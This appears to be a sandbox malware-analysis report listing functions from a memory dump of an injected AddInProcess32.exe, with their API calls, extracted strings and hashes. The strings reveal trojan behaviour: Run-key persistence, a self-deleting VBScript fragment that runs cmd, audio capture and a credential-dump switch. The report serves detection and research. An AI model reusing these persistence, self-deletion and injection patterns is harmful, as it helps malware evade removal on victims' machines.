                                                                                                  • String ID: """, 0$")$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$HSG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$tMG$wend$while fso.FileExists("
                                                                                                  • API String ID: 1861856835-2336284224
                                                                                                  • Opcode ID: c4393fd19bccd6c2f879462f0d82df3a4d9ae7d33e2cc77a0976e46010ec0e0e
                                                                                                  • Instruction ID: 74aa42f7ec26bf67edaf4e1a165d404297a62af2c65c2789fcbb2c22ca84ca6d
                                                                                                  • Opcode Fuzzy Hash: c4393fd19bccd6c2f879462f0d82df3a4d9ae7d33e2cc77a0976e46010ec0e0e
                                                                                                  • Instruction Fuzzy Hash: B991B1316082005AC315FB62D8529AFB3A8AF94309F50443FB64AA71E3EF7C9D49C65E
                                                                                                  Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D1E0
                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D223
                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D232
                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                                  • ExitProcess.KERNEL32 ref: 0040D454
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                  • String ID: ")$.vbs$HSG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$tMG$wend$while fso.FileExists("$xpF
                                                                                                  • API String ID: 3797177996-3101290586
                                                                                                  • Opcode ID: 0fcb6c33d985934dd252e72b954aca4317726d392740a9dd8ed5da055631409f
                                                                                                  • Instruction ID: d04a29aa4e51556796b06844e147f4a7cb6a24a543372ca0e3e4f3e54a9e1c14
                                                                                                  • Opcode Fuzzy Hash: 0fcb6c33d985934dd252e72b954aca4317726d392740a9dd8ed5da055631409f
                                                                                                  • Instruction Fuzzy Hash: 7781A1716082405BC715FB62D8529AF73A8AF94308F10443FB58A671E3EF7C9E49C69E
                                                                                                  Function 004124B0 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750F4,00000003), ref: 004124CF
                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                                  • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                                  • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                  • String ID: (TG$.exe$HSG$WDH$exepath$open$temp_
                                                                                                  • API String ID: 2649220323-4116078715
                                                                                                  • Opcode ID: f91c537b1438423dbbe7fd67c0860d571bb6d269f80a0bb95348768309dd1152
                                                                                                  • Instruction ID: 24c9a3d3f9f851b6826daa3a71410153ee30a0e468f06c14c2e22e8a151f545e
                                                                                                  • Opcode Fuzzy Hash: f91c537b1438423dbbe7fd67c0860d571bb6d269f80a0bb95348768309dd1152
                                                                                                  • Instruction Fuzzy Hash: B551C771A00315BBDB10ABA09C99EFE336D9B04755F10416BF901E72D2EFBC8E85865D
                                                                                                  Function 0041B0D8 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EF0,00000000), ref: 0041B21F
                                                                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                                  • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                                  • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                  • API String ID: 738084811-1354618412
                                                                                                  • Opcode ID: d07c2e591f182763e9b9265b4258d123774224afecaf1caba758f500f614ac27
                                                                                                  • Instruction ID: 3073296416e4f75d74a960dba2816641598052066ba22d453d93bca4cbe87184
                                                                                                  • Opcode Fuzzy Hash: d07c2e591f182763e9b9265b4258d123774224afecaf1caba758f500f614ac27
                                                                                                  • Instruction Fuzzy Hash: 4E51A5B12442056ED714B731DC96EBF379CDB80359F10053FB24A621E2EF789D4986AE
                                                                                                  Function 00401CE9 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                                                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401D7F
                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401D8F
                                                                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401D9F
                                                                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401DAF
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401DBF
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401DD0
                                                                                                  • WriteFile.KERNEL32(00000000,00472ACA,00000002,00000000,00000000), ref: 00401DE1
                                                                                                  • WriteFile.KERNEL32(00000000,00472ACC,00000004,00000000,00000000), ref: 00401DF1
                                                                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401E01
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401E12
                                                                                                  • WriteFile.KERNEL32(00000000,00472AD6,00000002,00000000,00000000), ref: 00401E23
                                                                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401E33
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401E43
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$Write$Create
                                                                                                  • String ID: RIFF$WAVE$data$fmt
                                                                                                  • API String ID: 1602526932-4212202414
                                                                                                  • Opcode ID: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                                                                                  • Instruction ID: 52f5d26e7cd893c7c7a939122a780f0294375d64c437cdec10b118f5e091287a
                                                                                                  • Opcode Fuzzy Hash: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                                                                                  • Instruction Fuzzy Hash: 61414D72644208BAE210DB51DD85FBB7FECEB89F54F40041AFA44D6081E7A5E909DBB3
                                                                                                  Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000003,004076B0,004752E8,00407709), ref: 004072BF
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                  • API String ID: 1646373207-4283035339
                                                                                                  • Opcode ID: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
                                                                                                  • Instruction ID: 830827c477b4c5a159b6e54fb752daf43fd3ce12eed95b51e760902f95858ec4
                                                                                                  • Opcode Fuzzy Hash: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
                                                                                                  • Instruction Fuzzy Hash: 66015EA0E4431676DB116F7AAD44D5B7EDD9E41351311087BB405E2292EEBCE800C9AE
                                                                                                  Function 0040CE34 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _wcslen.LIBCMT ref: 0040CE42
                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750F4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,004750F4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                                                                  • _wcslen.LIBCMT ref: 0040CF21
                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000), ref: 0040CFBF
                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                                  • _wcslen.LIBCMT ref: 0040D001
                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750F4,0000000E), ref: 0040D068
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                                  • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$del$open$RG$RG
                                                                                                  • API String ID: 1579085052-2529979590
                                                                                                  • Opcode ID: 52f4f3f1bc35ba706b6d12aaaeccf9499893d0d940b3e626f3016a651ae181ef
                                                                                                  • Instruction ID: ff97e746579a928a3d51456624c9bd3823d06e613cf3e42bd6c526c8f9e3827f
                                                                                                  • Opcode Fuzzy Hash: 52f4f3f1bc35ba706b6d12aaaeccf9499893d0d940b3e626f3016a651ae181ef
                                                                                                  • Instruction Fuzzy Hash: 8051C620208302ABD615B7769C92A6F67999F84719F10443FF609BA1E3EF7C9C05866E
                                                                                                  Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                                  • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                                  • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                                  • _wcslen.LIBCMT ref: 0041C1CC
                                                                                                  • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                                  • GetLastError.KERNEL32 ref: 0041C204
                                                                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                                  • GetLastError.KERNEL32 ref: 0041C261
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                  • String ID: ?
                                                                                                  • API String ID: 3941738427-1684325040
                                                                                                  • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                                                                  • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                                  • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                                                                  • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                                  Function 00414DC1 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                  • String ID: EIA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                  • API String ID: 2490988753-3346362794
                                                                                                  • Opcode ID: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                                                                                  • Instruction ID: 3afff981d8ce70f6205f85204df1f21ec1f12b20cff6a054e3a0857f0929e507
                                                                                                  • Opcode Fuzzy Hash: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                                                                                  • Instruction Fuzzy Hash: 3231C2B2906315ABD7209F65CC84EDF76DCAB84754F004A2AF984A3211D738D985CBAE
                                                                                                  Function 0044F4AD Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3899193279-0
                                                                                                  • Opcode ID: 546d6b1eb3b41f64b2e76db450b04a782591562765fde2d4f0a87aa2ff6224bf
                                                                                                  • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                                  • Opcode Fuzzy Hash: 546d6b1eb3b41f64b2e76db450b04a782591562765fde2d4f0a87aa2ff6224bf
                                                                                                  • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                                  Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                  • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                  • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                  • Shell_NotifyIconA.SHELL32(00000002,00474B58), ref: 0041D6EE
                                                                                                  • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                                  • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                  • String ID: Close
                                                                                                  • API String ID: 1657328048-3535843008
                                                                                                  • Opcode ID: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                                                                                  • Instruction ID: b66198a42bffced696eb94d9f3abdc54ecf3157c52e3fd06dc0985426ba48be4
                                                                                                  • Opcode Fuzzy Hash: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                                                                                  • Instruction Fuzzy Hash: 51216BB1500208FFDF054FA4ED0EAAA7B35EB08302F000125FA19950B2D779EDA1EB18
                                                                                                  Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$Info
                                                                                                  • String ID:
                                                                                                  • API String ID: 2509303402-0
                                                                                                  • Opcode ID: 75151fbced3465edae0101cd141662f582d879f03032417287744dbc83fd132d
                                                                                                  • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                  • Opcode Fuzzy Hash: 75151fbced3465edae0101cd141662f582d879f03032417287744dbc83fd132d
                                                                                                  • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                  Function 00412AEF Relevance: 21.5, APIs: 9, Strings: 3, Instructions: 482sleepfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                                  • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                                  • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                                  • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                  • String ID: /stext "$@TG$@TG
                                                                                                  • API String ID: 1223786279-723413999
                                                                                                  • Opcode ID: a90acd8d7071acfa2d0e9883792276cd2d83e9ecc9e4a0baa673cf908a2511cc
                                                                                                  • Instruction ID: 54c64e465a66050ec466d83b34d0c9889d7f3cdaa7358c1e9e14d2467042f0e2
                                                                                                  • Opcode Fuzzy Hash: a90acd8d7071acfa2d0e9883792276cd2d83e9ecc9e4a0baa673cf908a2511cc
                                                                                                  • Instruction Fuzzy Hash: 5B0268315083414AC325FB62D891AEFB3E5AFD0348F50483FF58A971E2EF785A49C65A
                                                                                                  Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                  • _free.LIBCMT ref: 0045137F
                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
